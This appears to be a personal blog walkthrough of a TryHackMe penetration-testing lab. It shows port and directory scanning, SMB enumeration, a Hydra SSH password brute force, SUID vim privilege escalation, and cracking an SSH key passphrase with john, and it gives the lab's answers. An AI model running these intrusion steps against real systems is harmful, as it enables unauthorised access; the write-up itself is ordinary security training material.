TryHackMe: Basic Pentesting — Walkthrough

December 15, 2024
December 15, 2024 Jasper

Hi! It is time to look at the Basic Pentesting room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/room/basicpentestingjt


Task 1 (Web App Testing and Privilege Escalation)

In these set of tasks you’ll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

Credits to Josiah Pierce from Vulnhub.

Questions

Deploy the machine and connect to our network

Answer: No answer needed

Find the services exposed by the machine

This time I decided to use the following command:

nmap -sC -sV -oN nmap -p- <target ip>

The open ports are:

Port mapping!

We can see a SSH service, SMB, a webserver, in addition to Jserv and Tomcat.

And the script results:

Nmap script results

Answer: No answer needed

What is the name of the hidden directory on the web server(enter name without /)?

There is a web server running on port 80:

Visiting the home page

We can take a look at the source code:

Looking at the source code

Dev section…hmm.

Let’s search for hidden directories by using dirbuster or gobuster. We will use gobuster here. We can use the following command:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>
Using gobuster

We found found a development page. Maybe this is the one referred to in the source code!

Answer: development

User brute-forcing to find the username & password

Let’s have a look at the page we found:

Accessing the development page

Interesting. We get to see the files in the directory. Let’s have a look at both:

dev.txt:

Reading dev.txt

j.txt:

Reading j.txt

A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, which is a Java Web Application framework. In addition he mentions version 2.5.12 and that he used a REST version.

In the other file we get a hint about weak credentials found in the /etc/shadow file.

But we don’t have access to to the system yet!

Remember back from the port scanning that we discovered SMB? Let’s enumerate that. We do this with the following command:

enum4linux <target ip>

This gives us a bunch of info on the SMB service:

Running enum4linux

We can see that anonymous access is possible using ‘’ as username and ‘’ as password. A bit further below we read the following lines:

Discovered two user accounts

Jan and Kay. Sure sounds like the users mentioned in j.txt. So we can pretty much conclude that Jan has a weak password.

Let’s try bruteforce Jan’s account with Hydra! We can use the following command:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>

Let it run for a bit and you will find the answer:

Cracking Jan’s SSH access

Armando!

Answer: No answer needed

What is the username?

Answer: jan

BONUS:

We could also have figured this out by accessing the anonymous share through smbclient:

Accessing the SMB anonymous share

If we read this txt file:

Reading staff.txt

What is the password?

See above to find the cracked password.

Answer: armando

What service do you use to access the server(answer in abbreviation in all caps)?

We have seen a SSH service running.

Answer: SSH

Enumerate the machine to find any vectors for privilege escalation

We can now login with SSH. We can use the following command:

ssh jan@<ip>

Then write the password when prompted. We get access to jan’s home directory:

Logging into SSH

If we look a bit further we can get into Kay’s home directory as well:

Finding Kay’s home directory

We can see pass.bak, which is a backup of some kind. Maybe a password?

To be able to get escalated privileges we can use a tool such as LinEnum to get more info on possible attack vectors. We need to do the following:

  1. Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    You can copy the RAW text and enter it into a file called LinEnum.
  2. Startup a simple Python web server from the directory of the new file: python -m http.server 8000.
  3. Download the file from the target machine: wget http://<attacker ip>:8000/LinEnum
  4. You need to give yourself executable privileges on the file: chmod +x LinEnum
  5. Run it!

Alternatively you can use scp to copy it over!

Read through the results. I will paste a few interesting tidbits here:

LinEnum admin user results

We can see that Kay is an admin.

Can we write/write sensitive files?

We can read the passwd file, but not the shadow file.

Possibly interesting SUID file

Now this is interesting. Vim.basic is a SUID file, meaning we can run it with root privileges. Now we can use vim to read the pass.bak file from earlier!

Reading the pass.bak file

This is actually the answer to the final question!

We can now change user with the new password:

Switching user account to kay

Answer: No answer needed

What is the name of the other user you found(all lower case)?

Answer: kay

If you have found another user, what can you do with this information?

Listing files in Kay’s home directory

Well, here’s the thing. I already answered the final question. But on a more thorough look we can find out something interesting in Kay’s .ssh directory. There is a private key!

We can try logging in:

ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa

Unfortunately we are missing a passphrase:

Trying to gain SSH access to kay

We can use john the ripper to crack this, specifically ssh2john. This is located on the following location:

Locating ssh2john

Let’s run the following command after saving the rsa key on your attacker machine.

/opt/john/ssh2john.py kay_id_rsa > john_hash.txt

Now we can run John:

john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

And we find the passphrase:

Finding the passphrase with john

Now we can login:

Logging into Kay’s SSH
ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa

And enter the passphrase beeswax.

This was another way in!

Answer: No answer needed

What is the final password you obtain?

We found this earlier through vim.

Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy

Thanks for reading. Hopefully you found out that there are many ways to get root access 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

HTB Academy : Cybersecurity Training
Sign up for the best cybersecurity training courses and certifications! Enjoy browser-based interactive learning for…referral.hackthebox.com

Leave a Reply

Your email address will not be published. Required fields are marked *